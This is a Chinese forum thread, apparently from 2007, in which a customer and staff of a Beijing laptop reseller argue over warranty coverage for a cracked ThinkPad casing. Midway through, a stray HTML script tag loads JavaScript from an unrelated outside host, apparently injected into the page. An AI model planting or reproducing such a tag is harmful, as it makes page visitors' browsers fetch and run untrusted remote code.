开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

斑竹进来,质问翔意,你们的保修条例难道仅仅只是在忽悠大家,做做姿态吗!!

本人去年在贵公司购买的第二台本本x61(第一台是t43,至今完好),在使用过程中百般爱护,拿在手上怕磕了,背在肩上怕压了,敲着键盘怕击坏了,就是这样,也无法避免今早发现它的外壳边缘发现裂开断出它白色的断裂面,实为震惊,IBM的品质难道要与一双劣质皮鞋来相提并论?更为振惊的是当我满怀希望心情地询问翔意有关保修事宜之时还未描述完损坏具体情况,你们的接线员就断然回复我说不能给保,并且言之琢琢。这样的态度难道就是翔意长篇大论书写你们让人备感贴心,备感人性关怀保修条款的初衷吗?难道你们当初信势旦旦的为人民服务,方便大家使用IBM产品仅仅只是在那里喊喊口号,唱唱高调吗?忽悠着大家卖血卖房的把血汗钱往你们公司里送,出了事却高高挂起免责大旗,这让广大信任你们公司的顾客情何以堪?谁家没点事儿,你们难道没有换位思考过事情吗还是你们根本就不值得去换位思考呢?
尽管你们那位接线员最后在我百般请求下答应勉为其难地给看一看,但你们这样的做法的服务质量已经严重伤害了一个老客户的感情!你们不觉得应该在这件事上给我一个以及广大信任贵公司的黑友们一个满意的交待吗?

注:正常使用过程,未出现任何人为损坏的行为。更别说没事拿来当垫子坐,天凉了拿来当扇子用。
楼下的黑友,要同情就给点人气吧,谢谢大家
人为损坏不属于保修范围,这个是由ibm规定的,不是我们规定的,何谓人为损坏:只要是物理损坏都是人为损坏

而我们的保修规定里面明确写明人为损坏不属于保修。这个就是我们承诺。

如果你非觉的你的机器不是人为损坏的话可以咨询ibm,如果ibm说你的机器这种情况属于保修的话,我可以免费给你换一台新的

保修是负担在保修范围内的,不是什么都给你保修的,什么刷bios失败,进水,被偷,人为损坏都不属于保修范围的,这点只要是消费品都是一样的。当然如果你为这件东西买了保险另算

很少人会故意把自己的东西搞坏,但是难免出意外,但是有一点可以肯定的是没有外力作用的话是不会发生什么碎裂的。

另我问问了接线生当时接电话的情况,不论我们的接线生的语气到底是不是如你说的“百般请求下”。。我先给你道个歉,对不起您了,
但是事实上您的语气和我们接线生到底谁凶呢?事实上我们是不是说了您拿过来我们尽量帮你想想有没有办法处理一下呢?

机器裂了谁都不愿意,但是上来就责问我们?毕竟机器还是一直在您的手里吧?。。。。。我们可以尽量帮你想想办法,但是说句难听的 不帮您没错,帮你是人情,可您呢。。。还上来就质问我们。。。。我只能心寒了。。。。。。

另外查档之后发现你去年只买过一台x60s,而不是你所说的x61,去年x61还没上市。请你再看一下是不是搞错了在那里买的
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

至于态度已经服务质量你可以好好问问你们的接线员,看看是谁比较强横,在此我就不再赘述了,这种仁者见仁,智者见智的事情多说无益。如果你们的接线员有你这样的态度,凡事好商量,我也没必要去问责谁谁谁。我也说一句不中听的话,员工素质体现公司形象和意志,象你们这样的一家在京城有实力,有能力的公司服务员第一句话就能把顾客磕得半死,其它垄断公司的服务如中国移动,铁道部门已经让我如沐春风。

至于损坏的界定待我询问IBM后再进一步咨询贵公司。
咱们来一个原景重现
接电话之后我们的接线生第一句话:“您好”
您的第一句话:“我的本今天早上发现一个裂痕,我想到你这里修”
我们接线生的回话:“抱歉裂痕不属于保修”
您:“为什么不属于保修?”
接线生:“因为裂痕,破裂等属于人为损坏,而人为损坏是不给于保修的”
您:“那我这个本没摔过没磕过,放着不动自己就有裂痕了,你们就得给我修”
接线生:“这个本不可能不动她就自己产生裂痕的,抱歉这个不适于保修”
接线生:“要不您拿过来我们给你看一下”
您:直接挂了

以上是你和我们接线生的全套对话,到底谁凶大家看看吧,之后你发这个帖子说我们的态度不好。导致我们一个小姑娘挨训之后现在边上正委屈得哭呢。

最后我要说的是,我们这里去年只能查到你买过一台x60s,至于你说的x61我们这里没有记录,而且去年还没有出过什么x61,请你再核实一下是不是在我们这里买的。另外我们虽然不是垄断,但是我们也不允许别人任意的攻击我们,最后我个人觉得中移动的10086客服小姐态度挺好,当然前提是人家的工作能满足你合理的要求下,举个例子,你让他们陪你聊天我估计可能到最后也的生肚子气然后投诉他们。

也请您在ibm给您答复之后还我们一个公正。
兄弟消消气,机器有问题不止您不高兴,我们也不愿意看到这种问题

但是出现问题一定要解决,您把机器拿到公司来看一眼吧,我们来判断一下是否人为。

因为确实外观损坏到哪里都是不保修的,联想国际那么大大的一个上市企业都不能保,我们小小的一个翔意公司当然也没有实力做到对外观损坏的保修

另外翔意绝不再保修上刻意刁难客户,如果遇到您机器开不了机了,光驱不能读盘了等明显保修,我们二话不说给您维修(当然维修途时我们会看机器有没有进水等人为因素),翔意也有很多客户得到过这个服务的,您不放心可以看看我们公司内部的维修记录就知道了。

不过如果您特别在意,我们看看机器,争取给您分摊一些维修成本,有话好好说,咱们看了机器再协商吧,毕竟没看到机器,我们也不知道问题有多大。
呵呵,如果我是这样来和你们的接线员对话的话,我只能说,你需要好好考核下你们那位接线员的人品了。当然,如果她是您亲戚或家属,另当别论。只是我觉得很滑稽这样的一个情景再现(事实上我对于这样的对话内容感到哭笑不得)。
“我想到你这里修”,这是我说的吗?对于你那位接线员不知怎么篡改并加上的“你就得给我修”,我有点开始怀疑我是个文盲,我现在能体谅你为何会感到寒心。以至于我请求给看一看也变成她主动要求我拿过去看一看了。真是世风日下,人心不古。
还有,“我就直接挂了”,难道我在电话最后说的“那好吧,谢谢您”也被她为了达到某种目的给阉割了吗?中间n句对话也被略过了,按下不表,这样解释我自已的立场和态度实在没有意义,仿佛在向一个打了我家孩子的家长诉苦似的。如果我真如你们那位接线员描述的这样,我对于我所接受的24年高等教育感到耻辱。对于一个求着想着让你们办事的人,你觉得他/她的态度能强硬到什么地方去呢,是非曲直想想,任谁都能明白,如果不是她太聪明,就是我智商太低。

当我以上发发牢骚,怡笑方家。

另外,我问过IBM800(ps一句,巨人就是巨人)电话,回复是如果能证明不是不可抗拒的外力的话,可以在维修部门检测后给以保修, 其实我想说的是,很多事情其实好好商量就能让大家满意。

回复 5# 的帖子

谢谢您,人人都象您这样,还有谁能生得了气呢。
一件事情由不同人用不同的角度说自然给别人的感觉不一样,我在对话中没听出来您再求我们,那么有点这么个意思也好啊,相反和这篇贴子一样充满了敌意。谢谢您 这个词您可能是在心里说的我没有听到,但是你在这里说了,我就当和之前电话里说了一样,放心决不辜负您这个“谢谢您”,小姑娘也哭完了,事情我们也认亏给你花钱给你解决,当然联想要你出具证明这个不是人为损坏的证据,您100%是不可能出具的,不用24年的教育,只需要学过物理的人都知道一个物体如果没有外力影响的情况下是不可能发生任何断裂什么的。所以联想也很聪明知道你也出具不了,也没有人能给你出具,除非上帝行了,你这种现象要使别人相信你这个是自己放得好好的就裂了估计很难。如果您真聪明的话想想就应该明白联想这么说是处于什么目的。

不多说了,我之前说过了,人为损坏如果ibm(联想)能给你保修我给你一台新的,如果你坚定认为你的本没有人碰它自己就裂了的话,那么我只能建议你继续找人给你证明这种非地球能发生的现象在您的身上发生了,如果您最后一再找不到人给你证明这种现象的话,不得不承认或者赞同别人的观点“这个是您人为损坏的话”,还可以回来找我们我们帮你想办法,因为官方是不会管你得 所以我想说的就是,联想不管你,但介于您这么相信我们,我们答应帮你想办法解决。

最后请你回答一下
我们这里去年只能查到你买过一台x60s,至于你说的x61我们这里没有记录,而且去年还没有出过什么x61,请你再核实一下是不是在我们这里买的
呵呵,如果你真有录音,不访mail我一份,我还真想听听受过24年教育的人是如何对话只受过大专教育的人,我真想知道这是什么样的一种庆幸。非常感谢你们让我认识到什么叫自信,哪天我出自传的时候,可以拿此作为一个案例进行分析,标题为“我和xyKFmm不得不说的故事”。

另外,如果真让那位mm伤心难过,我这里先道歉了,要不,合着就得她来安慰我了,因为我刚也痛不欲生。
我的邮箱地址是 lipch@foxmail.com
X60吧,估计是我记错了,这是帮朋友买的,还有一台T60也是帮朋友买的,我自已买的是T43,为了便于事情描述述,在不废话的情况下简述之。
学过物理学的人都知道,这世界上没有什么是不可能的。很可惜,这的确是需要学习24年才能知道,很多物理现象都是从不可能中重新发现和再认识。
古人云说出来的话跟泼出去的水一样收不回来,不过,我还是才知道bbs是可以对过的话作编辑和再加工。受教,这24年的书我是白读了。
大家冷静,争取圆满解决问题就好了,您把机器拿到公司看一眼吧。

另外“我问过IBM800(ps一句,巨人就是巨人)电话,回复是如果能证明不是不可抗拒的外力的话,可以在维修部门检测后给以保修。”我想对于任何人都是是无法证明的吧。

其实官方售后和我们的售后的原则是一样的,一切按原则做事,不过我们也许有的时候态度比不上官方,这个像您道歉,我们以后慢慢完善好自己的服务。
原帖由 EddieFan 于 2007-12-28 16:58 发表
大家冷静,争取圆满解决问题就好了,您把机器拿到公司看一眼吧。

另外“我问过IBM800(ps一句,巨人就是巨人)电话,回复是如果能证明不是不可抗拒的外力的话,可以在维修部门检测后给以保修。”我想对于任何人都 ...

好说,您怎么称呼?最好能给个联系方式,您比较会说话。到时我联系您吧如果您觉得你能替消费者更多着想的话。